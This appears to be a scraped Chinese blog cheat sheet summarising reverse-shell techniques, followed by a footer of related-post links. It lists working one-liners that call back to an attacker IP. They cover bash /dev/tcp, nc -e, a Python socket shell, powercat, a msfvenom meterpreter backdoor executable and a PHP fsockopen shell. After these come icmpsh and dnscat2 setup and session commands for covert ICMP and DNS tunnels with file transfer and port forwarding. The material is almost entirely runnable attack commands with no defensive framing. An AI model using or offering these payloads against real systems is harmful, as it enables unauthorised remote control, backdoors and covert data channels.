1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1

2.nc反弹nc -e /bin/sh 192.168.2.130 4444

3.pythonimport socket,subprocess,os

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(( "192.168.2.130" , 4444 ))

os.dup2(s.fileno(), 0 )

os.dup2(s.fileno(), 1 )

os.dup2(s.fileno(), 2 )

p = subprocess.call([ "/bin/bash" , "-i" ])

4.powercatImport-Module .\powercat.ps1

powercat -c 192.168.2.130 -p 4444 -e cmd.exe

5.msf生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe

6.php反弹shellphp -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'

7.ICMP关闭icmp呼应,否则shell一直跳,恢复是0

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py 源 目标

python icmpsh_m.py 192.168.2.137 192.168.2.135

在windows7运转:icmpsh.exe -t 192.168.2.137

8.DNS

这儿咱们运用dnscat2,这儿是下载的,分为windows和linux版本,服务端和客户端。

并且引荐运用vs2008编译

安装git clone https://github.com/iagox86/dnscat2.git

cd dnscat2

cd server

sudo gem install bundler

bundle install

sudo ruby ./dnscat2.rb

kaliruby dnscat2.rb --dns host=0.0.0.0,port=53531

ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)

ruby dnscat2.rb xxx.com

windows7中:./dnscat --dns server=192.168.2.130,port=53531

./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)

./dnscat xxx.com

衔接成功后

查看记载

挑选衔接

运用shell

回来挑选shell

执行指令

其他指令quit (退出控制台)

kill(中断通道)

set(设值,比方设置security=open)

windows(列举出所有的通道)

window -i(衔接某个通道)

衔接通道后,运用help相同能够看到其内支持的指令(单个指令后跟-h也会解释该指令):

clear(清屏)

delay(修改长途会话超时时间)

exec(执行长途机上的程序)

shell(得到一个反弹shell)

download/upload(两头之间上传下载文件)

supend(回来到上一层,等于快捷键ctrl+z)

DNS地道转发listen 127.0.0.1:6666 192.168.2.135:80

本机的6666就能够拜访80端口

msf生成php反弹,反弹shell总结相关推荐

  1. msf反弹php shell,反弹shell总结

    1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 2.nc反弹nc -e /bin/sh 192.168.2.130 444 ...

  2. linux openssl 反弹加密 shell

    前言 在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明 ...

  3. 使用 openssl反弹加密 shell

    目录 前言 OpenSSL 简介 使用 OpenSSL 生成证书自签名证书 使用 OpenSSL 反弹加密 shell Linux Windows 使用 OpenSSL 搭建简易 HTTPS Serv ...

  4. php反弹,【原创】文件包含结合phpinfo反弹交互shell

    1.简介 在PHP文件包含漏洞中,当我们找不到用于触发RCE的有效文件时,如果存在PHPINFO(它可以告诉我们临时文件的随机生成的文件名及其位置),我们可能可以包含一个临时文件来利用它. 当向PHP ...

  5. Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹

    Kali渗透测试:远程控制被控端免杀及DLL生成.注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的 ...

  6. msf生成payload大全

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog CTF-专栏:https://blog.csdn.net ...

  7. msf 生成.wsf 木马

    ** 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享! ** 首先了解wsf是啥语言,可参考文章如下: https://www.cnblogs.com/vitrox/p/51374 ...

  8. kali中使用msf制作Windows恶意软件获取shell

    1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些 ...

  9. msf生成linux elf木马反弹shell

    最开始用的生成木马的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf & ...

最新文章

  1. 鱼眼镜头标定基本原理及实现
  2. find命令过滤 no such_运维老手常用的linux命令操作
  3. 【渝粤教育】国家开放大学2018年春季 0177-22T电机学(二) 参考试题
  4. Flink中的Time与Window
  5. 修复mysql的view_MYSQL数据损坏修复方法
  6. linux使用ping命令ping本机,Linux下使用ping命令判断网络的好坏
  7. 本地项目推送到码云私有仓库
  8. c#web页面显示弹窗_web页面实现PDF读取显示
  9. python封装数据库操作_Python3 数据库操作小封装
  10. 如何用计算机解开op手机密码,OPPO手机忘记解锁密码怎么办 OPPO R9忘记解锁密码解锁教程...
  11. XUI 熟练使用之(一) ----------- 将 XUI 引入项目
  12. angular ui-bootstrap的Datepicker Popup组件问题总结
  13. 一秒钟速算(WINFORM)
  14. Java实现anagram算法
  15. barman备份软件离线安装渡劫文
  16. 电脑开机太慢?这5个方法瞬间提升你的电脑速度
  17. Android多点触控之——MotionEvent(触控事件)
  18. 音叉公振频率与双臂质量的计算关系
  19. linux 判断u盘 硬盘坏道,u盘怎么检测硬盘坏道
  20. 虚拟机与本机连接网络设置

热门文章

  1. 什么是原型、原型链?原型和原型链的作用(有图方便理解)
  2. linux在终端如何使用代理
  3. 为何中国没有亚伦 斯沃茨_史蒂夫·斯沃茨(Steve Swartz)让我们想起了靛蓝的意图...
  4. OAuth 1.0 简介
  5. String类的学习笔记(中):介绍字符串的不可变性和字符串常量池
  6. 网络1711-12 数据结构第一次作业评分
  7. 图像中Alpha通道
  8. oracle12c-AFD故障
  9. Docker Swarm使用介绍和部署
  10. 简析:阿里巴巴最近20个月的拆分史